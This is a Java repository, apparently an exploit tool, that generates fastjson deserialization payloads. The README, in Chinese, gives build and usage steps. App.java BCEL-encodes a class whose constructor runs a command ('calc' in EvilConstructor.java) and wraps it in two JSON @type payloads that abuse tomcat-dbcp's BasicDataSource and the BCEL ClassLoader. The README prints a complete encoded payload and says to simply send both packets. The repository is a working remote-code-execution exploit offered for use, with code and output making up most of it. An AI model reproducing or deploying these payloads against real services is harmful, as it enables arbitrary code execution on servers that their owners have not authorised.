├── src
    ├── main
    │   └── java
    │   │   ├── EvilConstructor.java
    │   │   └── com
    │   │       └── example
    │   │           └── App.java
    └── test
    │   └── java
    │       └── com
    │           └── example
    │               └── AppTest.java
├── .gitignore
├── LICENSE
├── BcelGenerator.iml
├── README.md
└── pom.xml


/src/main/java/EvilConstructor.java:
--------------------------------------------------------------------------------
 1 | 
 2 | public class EvilConstructor {
 3 | 
 4 |     public EvilConstructor(){
 5 |         try {
 6 |             Runtime.getRuntime().exec("calc");
 7 |         } catch (Exception e) {
 8 |             e.printStackTrace();
 9 |         }
10 |     }
11 | 
12 |     public static void main(String[] args) {
13 | 
14 |     }
15 | }


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Compiled class file
 2 | *.class
 3 | 
 4 | # Log file
 5 | *.log
 6 | 
 7 | # BlueJ files
 8 | *.ctxt
 9 | 
10 | # Mobile Tools for Java (J2ME)
11 | .mtj.tmp/
12 | 
13 | # Package Files #
14 | *.jar
15 | *.war
16 | *.nar
17 | *.ear
18 | *.zip
19 | *.tar.gz
20 | *.rar
21 | 
22 | .idea/
23 | target/
24 | 
25 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
26 | hs_err_pid*
27 | 


--------------------------------------------------------------------------------
/src/test/java/com/example/AppTest.java:
--------------------------------------------------------------------------------
 1 | package com.example;
 2 | 
 3 | import static org.junit.Assert.assertTrue;
 4 | 
 5 | import org.junit.Test;
 6 | 
 7 | /**
 8 |  * Unit test for simple com.example.App.
 9 |  */
10 | public class AppTest 
11 | {
12 |     /**
13 |      * Rigorous Test :-)
14 |      */
15 |     @Test
16 |     public void shouldAnswerWithTrue()
17 |     {
18 |         assertTrue( true );
19 |     }
20 | }
21 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 隐形人真忙
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/BcelGenerator.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
 3 |   <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_7">
 4 |     <output url="file://$MODULE_DIR$/target/classes" />
 5 |     <output-test url="file://$MODULE_DIR$/target/test-classes" />
 6 |     <content url="file://$MODULE_DIR$">
 7 |       <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
 8 |       <sourceFolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
 9 |       <excludeFolder url="file://$MODULE_DIR$/target" />
10 |     </content>
11 |     <orderEntry type="inheritedJdk" />
12 |     <orderEntry type="sourceFolder" forTests="false" />
13 |     <orderEntry type="library" scope="TEST" name="Maven: junit:junit:4.11" level="project" />
14 |     <orderEntry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
15 |     <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-dbcp:9.0.22" level="project" />
16 |     <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:9.0.22" level="project" />
17 |   </component>
18 | </module>


--------------------------------------------------------------------------------
/src/main/java/com/example/App.java:
--------------------------------------------------------------------------------
 1 | package com.example;
 2 | 
 3 | import com.sun.org.apache.bcel.internal.Repository;
 4 | import com.sun.org.apache.bcel.internal.classfile.JavaClass;
 5 | import com.sun.org.apache.bcel.internal.classfile.Utility;
 6 | 
 7 | import java.net.URL;
 8 | import java.net.URLClassLoader;
 9 | 
10 | public class App {
11 |     public static void main( String[] args ) throws  Exception{
12 |         String classFilePath = args[0];
13 |         String className = args[1];
14 |         //URL url = new URL("file:///D:/codes/BcelGenerator/target/classes/EvilConstructor.class");
15 |         URL url = new URL(classFilePath);
16 |         URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
17 |         Class evilClass = classLoader.loadClass(className);
18 |         JavaClass cls = Repository.lookupClass(evilClass);
19 |         String codes = Utility.encode(cls.getBytes(), true);
20 | 
21 |         String payload_1 = "{\"name\": {\"@type\":\"java.lang.Class\",\"val\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";
22 |         String payload_2 = "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"},\"f\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\", \"driverClassName\": \"org.apache.log4j.spi$$BCEL$$" + codes + "\", \"driverClassLoader\":{\"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}, \"age\":10}";
23 | 
24 |         System.out.println("第一个包：");
25 |         System.out.println(payload_1);
26 |         System.out.println("第二个包：");
27 |         System.out.println(payload_2);
28 |     }
29 | }
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # BcelPayloadGenerator
 2 | 
 3 | 该payload使用tomcat-dbcp中的BasicDataSource，无需另起ldap或者RMI也可以触发fastjson漏洞。
 4 | 
 5 | ### 1.准备好EvilConstructor的.class文件，放在任意文件内
 6 | 
 7 | ### 2.执行生成payload
 8 | 
 9 | 命令：
10 | 
11 | ```
12 | java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App [classpath] [classname]
13 | classpath是EvilConstructor.class所在目录
14 | classname是EvilConstructor.class具体的类的名字
15 | 
16 | Demo:
17 | java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App file:///D:/EvilConstructor.class EvilConstructor
18 | ```
19 | 
20 | ### 3.生成Payload
21 | 
22 | 第一个包：
23 | ```
24 | {"name": 
25 | 	{
26 | 		"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
27 | 	}
28 | }
29 | ```
30 | 
31 | 第二个包：
32 | 
33 | ```
34 | {"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicData
35 | Source"},"f":{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverCla
36 | ssName": "org.apache.log4j.spi$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$cbN$db$40$U$3d$93$
37 | b8vp$j$f2$80$d0$96$3e$80$bep$40$w$8b$$$a9$baAt$e5$3e$d4$m$ba$605$ZF$e9$d0$c4$8e$
38 | s$T$c4$a2$ff$c3$9a$NT$5d$f4$D$faQm$cf$98$aa$m$g$5b$f7$5e$dd$c79s$ee$d8$3f$7f$7d$
39 | ff$B$e0$r6b$d4p$3f$c6$D$3c$ac$e1$91$8f$x$RVc$dc$c2Z$84$c7$R$9e$I$84$afLn$dck$81j
40 | $da$dd$X$Iv$8aC$z$d0$c8L$ae$dfMG$7dm$f7d$7f$c8J$3b$x$94$i$eeKk$7c$fe$b7$uh$9d$ec
41 | H$k$cb$ad$a1$cc$H$5b$bb$tJ$8f$9d$v$f2m2$b9$cff$o$d0$cav$8f$cdp$a7$c8$t$ceN$95$x$
42 | y$5b$f5$9e$93$ea$cb$5b9$$iJ$r$ab$E$8c$a4$c9$F$96$d2$83k$8c$3dgM$3e$d8$$$a5I$3b$m
43 | $e1$c2$8c$b6$40$dc$x$a6V$e97$c6$cbZ$bcq$e4$L$PH0$878$c2$d3$E$cf$f0$9cl$dcF$rXGJ$
44 | ca$Z$h$q$e8$o$e6E$dc$a0$Sh$5e$N$bf$ef$li$e5$b8$e3U$e9$e34wfD$N$f1$40$bb$7fI$t$ed
45 | f$ff$cd$f8$3b$d2$tZ$J$ac$a736$beV$fa$60$L$a5$t$T$C$gc6$5dy$7d$7bV$w$8d5D$fc$c4$f
46 | e$a9$40$f8$N$e9o3$fb$ca$bc$c2$b8$b4q$B$f1$N$95v$f5$i$c1$a7S$d4$b2$cds$84g$9c$KPG
47 | $93$7fB$V$J$e7$96$R$d2$H$7cC$d6$e7$d8$89$d0$os$87$8cu$cfC$b6$W$bb$f3h$Q$eb$f3$ss
48 | $a0Mk$a2$f2$9bNDX$f0n1$m$be$c3$89K$r$9b4$8f$Qg$a5H$7fXX$W$e6K$e2$e4$b2$89$3b$b8$
49 | 5b$c6$7b$e5$d4$f2$lp$8cf$3b$c3$C$A$A", "driverClassLoader":{"@type": "com.sun.or
50 | g.apache.bcel.internal.util.ClassLoader"}}, "age":10}
51 | ```
52 | 
53 | 发两个包过去就行了。
54 | 


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | 
  3 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4 |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  5 |   <modelVersion>4.0.0</modelVersion>
  6 | 
  7 |   <groupId>com.example</groupId>
  8 |   <artifactId>BcelGenerator</artifactId>
  9 |   <version>1.0-SNAPSHOT</version>
 10 | 
 11 |   <name>BcelGenerator</name>
 12 |   <!-- FIXME change it to the project's website -->
 13 |   <url>http://www.example.com</url>
 14 | 
 15 |   <properties>
 16 |     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
 17 |     <maven.compiler.source>1.7</maven.compiler.source>
 18 |     <maven.compiler.target>1.7</maven.compiler.target>
 19 |   </properties>
 20 | 
 21 |   <dependencies>
 22 |     <dependency>
 23 |       <groupId>junit</groupId>
 24 |       <artifactId>junit</artifactId>
 25 |       <version>4.11</version>
 26 |       <scope>test</scope>
 27 |     </dependency>
 28 | 
 29 |     <dependency>
 30 |       <groupId>org.apache.tomcat</groupId>
 31 |       <artifactId>tomcat-dbcp</artifactId>
 32 |       <version>9.0.22</version>
 33 |     </dependency>
 34 | 
 35 |   </dependencies>
 36 | 
 37 |   <build>
 38 |     <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
 39 |       <plugins>
 40 |         <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
 41 |         <plugin>
 42 |           <artifactId>maven-clean-plugin</artifactId>
 43 |           <version>3.1.0</version>
 44 |         </plugin>
 45 |         <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
 46 |         <plugin>
 47 |           <artifactId>maven-resources-plugin</artifactId>
 48 |           <version>3.0.2</version>
 49 |         </plugin>
 50 |         <plugin>
 51 |           <artifactId>maven-compiler-plugin</artifactId>
 52 |           <version>3.8.0</version>
 53 |         </plugin>
 54 |         <plugin>
 55 |           <artifactId>maven-surefire-plugin</artifactId>
 56 |           <version>2.22.1</version>
 57 |         </plugin>
 58 |         <plugin>
 59 |           <artifactId>maven-jar-plugin</artifactId>
 60 |           <version>3.0.2</version>
 61 |         </plugin>
 62 |         <plugin>
 63 |           <artifactId>maven-install-plugin</artifactId>
 64 |           <version>2.5.2</version>
 65 |         </plugin>
 66 |         <plugin>
 67 |           <artifactId>maven-deploy-plugin</artifactId>
 68 |           <version>2.8.2</version>
 69 |         </plugin>
 70 |         <!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
 71 |         <plugin>
 72 |           <artifactId>maven-site-plugin</artifactId>
 73 |           <version>3.7.1</version>
 74 |         </plugin>
 75 |         <plugin>
 76 |           <artifactId>maven-project-info-reports-plugin</artifactId>
 77 |           <version>3.0.0</version>
 78 |         </plugin>
 79 |         <plugin>
 80 |           <artifactId>maven-assembly-plugin</artifactId>
 81 |           <configuration>
 82 |             <descriptorRefs>
 83 |               <descriptorRef>jar-with-dependencies</descriptorRef>
 84 |             </descriptorRefs>
 85 |           </configuration>
 86 |           <executions>
 87 |             <execution>
 88 |               <id>make-assembly</id>
 89 |               <phase>package</phase>
 90 |               <goals>
 91 |                 <goal>single</goal>
 92 |               </goals>
 93 |             </execution>
 94 |           </executions>
 95 |         </plugin>
 96 | 
 97 |       </plugins>
 98 |     </pluginManagement>
 99 |   </build>
100 | </project>
101 | 


--------------------------------------------------------------------------------